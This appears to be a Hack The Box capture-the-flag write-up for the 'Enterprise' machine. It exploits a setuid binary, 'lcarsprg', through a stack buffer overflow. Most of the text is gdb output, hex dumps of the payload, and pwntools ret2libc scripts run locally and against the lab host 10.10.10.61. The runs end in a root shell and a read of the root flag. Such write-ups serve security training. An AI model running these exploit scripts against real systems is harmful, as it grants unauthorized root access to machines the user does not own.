u505@kali:~/HTB/Machines/Enterprise$ sudo sysctl kernel.randomize_va_space=0 [sudo] password for u505: kernel.randomize_va_space = 0
gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : disabled PIE : ENABLED RELRO : Partial
u505@kali:~/HTB/Machines/Enterprise$ sudo chown root lcarsprg u505@kali:~/HTB/Machines/Enterprise$ sudo chmod 4755 lcarsprg
Offset overflow determination
gdb-peda$ pattern create 300 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%' gdb-peda$ r Starting program: /opt/HTB/Machines/Enterprise/lcarsprg
_______ _______ ______ _______ | | |_____| |_____/ |______ |_____ |_____ | | | \_ ______|
Welcome to the Library Computer Access and Retrieval System
Enter Bridge Access Code: picarda1
_______ _______ ______ _______ | | |_____| |_____/ |______ |_____ |_____ | | | \_ ______|
Welcome to the Library Computer Access and Retrieval System
LCARS Bridge Secondary Controls -- Main Menu:
1. Navigation 2. Ships Log 3. Science 4. Security 5. StellaCartography 6. Engineering 7. Exit Waiting for input: 4 Disable Security Force Fields Enter Security Override: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%
Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x14e EBX: 0x73254125 ('%A%s') ECX: 0x0 EDX: 0x56555eec --> 0xa00 () ESI: 0xf7f9f000 --> 0x1dfd6c EDI: 0xf7f9f000 --> 0x1dfd6c EBP: 0x41422541 ('A%BA') ESP: 0xffffd500 ("nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%") EIP: 0x25412425 ('%$A%') EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x25412425 [------------------------------------stack-------------------------------------] 0000| 0xffffd500 ("nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%") 0004| 0xffffd504 ("A%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%") 0008| 0xffffd508 ("%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%") 0012| 0xffffd50c ("DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%") 0016| 0xffffd510 ("A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%") 0020| 0xffffd514 ("%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%") 0024| 0xffffd518 ("aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%") 0028| 0xffffd51c ("A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x25412425 in ?? () gdb-peda$ pattern offset 0x25412425 625026085 found at offset: 212
To verify, we create a small exploit.
u505@kali:~/HTB/Machines/Enterprise$ cat exploit_deadc0de.py #!/usr/bin/python from pwn import * junk = 'D'*212 eip=0xdeadc0de after = 'U'*8 accesscode = "picarda1\n4\n"
payload = accesscode + junk + p32(eip) + after #print payload file = open("payload","w") file.write (payload) file.close()
We create the payload.
u505@kali:~/HTB/Machines/Enterprise$ python exploit_deadc0de.py u505@kali:~/HTB/Machines/Enterprise$ xxd payload 00000000: 7069 6361 7264 6131 0a34 0a44 4444 4444 picarda1.4.DDDDD 00000010: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 00000020: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 00000030: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 00000040: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 00000050: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 00000060: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 00000070: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 00000080: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 00000090: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 000000a0: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 000000b0: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 000000c0: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 000000d0: 4444 4444 4444 4444 4444 4444 4444 44de DDDDDDDDDDDDDDD. 000000e0: c0ad de55 5555 5555 5555 55 ...UUUUUUUU
And pass the payload to the program.
u505@kali:~/HTB/Machines/Enterprise$ ./lcarsprg < payload
_______ _______ ______ _______ | | |_____| |_____/ |______ |_____ |_____ | | | \_ ______|
Welcome to the Library Computer Access and Retrieval System
Enter Bridge Access Code:
_______ _______ ______ _______ | | |_____| |_____/ |______ |_____ |_____ | | | \_ ______|
Welcome to the Library Computer Access and Retrieval System
LCARS Bridge Secondary Controls -- Main Menu:
1. Navigation 2. Ships Log 3. Science 4. Security 5. StellaCartography 6. Engineering 7. Exit Waiting for input: Disable Security Force Fields Enter Security Override: Segmentation fault u505@kali:~/HTB/Machines/Enterprise$ sudo tail -n 2 /var/log/syslog [sudo] password for u505: May 21 22:36:58 kali kernel: [30755.607815] lcarsprg[10545]: segfault at deadc0de ip 00000000deadc0de sp 00000000ff808a20 error 14 in libc-2.30.so[f7d20000+1de000] May 21 22:36:58 kali kernel: [30755.607834] Code: Bad RIP value.
As expected, the program crashes on the value of EIP deadc0de.
local exploit
u505@kali:~/HTB/Machines/Enterprise$ ldd lcarsprg
linux-gate.so.1 (0xf7fd2000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7dbb000)
/lib/ld-linux.so.2 (0xf7fd4000)
u505@kali:~/HTB/Machines/Enterprise$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " system@@"
1533: 00044630 55 FUNC WEAK DEFAULT 14 system@@GLIBC_2.0
u505@kali:~/HTB/Machines/Enterprise$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " exit@@"
150: 000373a0 33 FUNC GLOBAL DEFAULT 14 exit@@GLIBC_2.0
u505@kali:~/HTB/Machines/Enterprise$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
188406 /bin/sh
With the addresses of system, exit and /bin/sh, we build our exploit.
u505@kali:~/HTB/Machines/Enterprise$ cat exploit_local.py #!/usr/bin/python from pwn import * junk = 'D'*212
process = process('./lcarsprg')
glibcbase=0xf7dbb000 systemoffs=0x00044630 exitoff=0x000373a0 binshoff=0x188406
systemaddr=glibcbase+systemoffs exitaddr=glibcbase+exitoff binshaddr=glibcbase+binshoff
log.info("systemaddr 0x%x" % systemaddr) log.info("exitaddr 0x%x" % exitaddr) log.info("binshaddr 0x%x" % binshaddr) payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)
process.recvuntil('Enter Bridge Access Code:') process.send('picarda1\n') process.recvuntil('Waiting for input:') process.send('4\n') process.recvuntil('Enter Security Override:') process.send (payload) process.send ('\n') process.interactive()
#print payload file = open("payload","w") file.write (payload) file.close()
We test it.
u505@kali:~/HTB/Machines/Enterprise$ python exploit_local.py [+] Starting local process './lcarsprg': pid 8733 [*] systemaddr 0xf7dff630 [*] exitaddr 0xf7df23a0 [*] binshaddr 0xf7f43406 [*] Switching to interactive mode
*** stack smashing detected ***: <unknown> terminated [*] Got EOF while reading in interactive $ [*] Process './lcarsprg' stopped with exit code -6 (SIGABRT) (pid 8733) [*] Got EOF while sending in interactive
But it doesn't work.
gdb-peda$ br main
Breakpoint 1 at 0x56555ca0
gdb-peda$ r
Starting program: /opt/HTB/Machines/Enterprise/lcarsprg
[----------------------------------registers-----------------------------------]
EAX: 0xf7fa1808 --> 0xffffd61c --> 0xffffd76a ("SHELL=/bin/bash")
EBX: 0x0
ECX: 0xffffd580 --> 0x1
EDX: 0xffffd5a4 --> 0x0
ESI: 0xf7f9f000 --> 0x1dfd6c
EDI: 0xf7f9f000 --> 0x1dfd6c
EBP: 0xffffd568 --> 0x0
ESP: 0xffffd560 --> 0xffffd580 --> 0x1
EIP: 0x56555ca0 (<main+15>: sub esp,0x10)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555c9c <main+11>: mov ebp,esp
0x56555c9e <main+13>: push ebx
0x56555c9f <main+14>: push ecx
=> 0x56555ca0 <main+15>: sub esp,0x10
0x56555ca3 <main+18>: call 0x56555620 <__x86.get_pc_thunk.bx>
0x56555ca8 <main+23>: add ebx,0x2358
0x56555cae <main+29>: sub esp,0x4
0x56555cb1 <main+32>: push 0x0
[------------------------------------stack-------------------------------------]
0000| 0xffffd560 --> 0xffffd580 --> 0x1
0004| 0xffffd564 --> 0x0
0008| 0xffffd568 --> 0x0
0012| 0xffffd56c --> 0xf7dddef1 (<__libc_start_main+241>: add esp,0x10)
0016| 0xffffd570 --> 0xf7f9f000 --> 0x1dfd6c
0020| 0xffffd574 --> 0xf7f9f000 --> 0x1dfd6c
0024| 0xffffd578 --> 0x0
0028| 0xffffd57c --> 0xf7dddef1 (<__libc_start_main+241>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x56555ca0 in main ()
gdb-peda$ print &system
$1 = (<text variable, no debug info> *) 0xf7e03630 <system>
gdb-peda$ print &exit
$2 = (<text variable, no debug info> *) 0xf7df63a0 <exit>
gdb-peda$ find /bin/sh
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xf7f47406 ("/bin/sh")
gdb-peda$ distance 0xf7dff630 0xf7e03630
From 0xf7dff630 to 0xf7e03630: 16384 bytes, 4096 dwords
The values are different. There is a difference of 4096 bytes on the address values. We rewrite our exploit with these values.
u505@kali:~/HTB/Machines/Enterprise$ cat exploit_local.py #!/usr/bin/python from pwn import * junk = 'D'*212
process = process('./lcarsprg')
#glibcbase=0xf7dbb000 #systemoffs=0x00044630 #exitoff=0x000373a0 #binshoff=0x188406
#systemaddr=glibcbase+systemoffs #exitaddr=glibcbase+exitoff #binshaddr=glibcbase+binshoff
systemaddr=0xf7e03630 exitaddr=0xf7df63a0 binshaddr=0xf7f47406
log.info("systemaddr 0x%x" % systemaddr) log.info("exitaddr 0x%x" % exitaddr) log.info("binshaddr 0x%x" % binshaddr) payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)
process.recvuntil('Enter Bridge Access Code:') process.send('picarda1\n') process.recvuntil('Waiting for input:') process.send('4\n') process.recvuntil('Enter Security Override:') process.send (payload) process.send ('\n') process.interactive()
#print payload file = open("payload","w") file.write (payload) file.close()
We test it.
u505@kali:~/HTB/Machines/Enterprise$ python exploit_local.py [+] Starting local process './lcarsprg': pid 8781 [*] systemaddr 0xf7e03630 [*] exitaddr 0xf7df63a0 [*] binshaddr 0xf7f47406 [*] Switching to interactive mode
$ $ id uid=0(root) gid=1000(u505) groups=1000(u505),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),120(scanner) $ exit Rerouting Tertiary EPS Junctions: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD06▒▒c▒▒\x0[*] Process './lcarsprg' stopped with exit code 0 (pid 8781) [*] Got EOF while reading in interactive $ [*] Got EOF while sending in interactive
Remote exploit
(gdb) br main Breakpoint 1 at 0x56555ca0 (gdb) r Starting program: /bin/lcars (gdb) print &system $1 = (<text variable, no debug info> *) 0xf7e4c060 <system> (gdb) print &exit $2 = (<text variable, no debug info> *) 0xf7e3faf0 <exit>
(gdb) find &system,+9999999,"/bin/sh" 0xf7f70a0f warning: Unable to access 16000 bytes of target memory at 0xf7fca797, halting search. 1 pattern found.
We create our exploit
u505@kali:~/HTB/Machines/Enterprise$ cat exploit_target.py #!/usr/bin/python from pwn import * junk = 'D'*212
conn = remote('10.10.10.61',32812)
systemaddr=0xf7e4c060 exitaddr=0xf7e3faf0 binshaddr=0xf7f70a0f log.info("systemaddr 0x%x" % systemaddr) log.info("exitaddr 0x%x" % exitaddr) log.info("binshaddr 0x%x" % binshaddr) payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)
conn.recvuntil('Enter Bridge Access Code:') conn.send('picarda1\n') conn.recvuntil('Waiting for input:') conn.send('4\n') conn.recvuntil('Enter Security Override:') conn.send (payload) conn.interactive()
#print payload file = open("payload","w") file.write (payload) file.close()
Run of the exploit
u505@kali:~/HTB/Machines/Enterprise$ python exploit_target.py [+] Opening connection to 10.10.10.61 on port 32812: Done [*] systemaddr 0xf7e4c060 [*] exitaddr 0xf7e3faf0 [*] binshaddr 0xf7f70a0f [*] Switching to interactive mode
Rerouting Tertiary EPS Junctions: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD`▒▒▒[*] Got EOF while reading in interactive $ id $ [*] Closed connection to 10.10.10.61 port 32812 [*] Got EOF while sending in interactive
It doesn't work.
u505@kali:~/HTB/Machines/Enterprise$ xxd payload
00000000: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000010: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000020: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000030: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000040: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000050: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000060: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000070: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000080: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000090: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
000000a0: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
000000b0: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
000000c0: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
000000d0: 4444 4444 60c0 e4f7 f0fa e3f7 0f0a f7f7 DDDD`...........
There is a line feed (0x0a) in the /bin/sh string. The payload is cut and the address of the sh string is not transmitted. Instead of looking for /bin/sh we search for sh only.
(gdb) find &system,+999999999999999,"sh" 0xf7f6ddd5 0xf7f6e7e1 0xf7f70a14 0xf7f72582 warning: Unable to access 16000 bytes of target memory at 0xf7fc8485, halting search. 4 patterns found.
We find 4 candidates, the third one correspond at our previous address more 5 bytes, the other 3 are usable.
u505@kali:~/HTB/Machines/Enterprise$ cat exploit_target.py #!/usr/bin/python from pwn import * junk = 'D'*212
conn = remote('10.10.10.61',32812)
systemaddr=0xf7e4c060 exitaddr=0xf7e3faf0 #binshaddr=0xf7f70a0f binshaddr=0xf7f6ddd5 log.info("systemaddr 0x%x" % systemaddr) log.info("exitaddr 0x%x" % exitaddr) log.info("binshaddr 0x%x" % binshaddr) payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)
conn.recvuntil('Enter Bridge Access Code:') conn.send('picarda1\n') conn.recvuntil('Waiting for input:') conn.send('4\n') conn.recvuntil('Enter Security Override:') conn.send (payload) conn.interactive()
#print payload file = open("payload","w") file.write (payload) file.close()
Run the exploit.
u505@kali:~/HTB/Machines/Enterprise$ python exploit_target.py [+] Opening connection to 10.10.10.61 on port 32812: Done [*] systemaddr 0xf7e4c060 [*] exitaddr 0xf7e3faf0 [*] binshaddr 0xf7f6ddd5 [*] Switching to interactive mode
$ $ id uid=0(root) gid=0(root) groups=0(root) $ cat /root/root.txt <ROOT_FLAG> $ exit Rerouting Tertiary EPS Junctions: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD`▒▒▒▒[*] Got EOF while reading in interactive $ $ [*] Closed connection to 10.10.10.61 port 32812 [*] Got EOF while sending in interactive
References
Daniel Simao 10:34, 25 May 2020 (EDT)
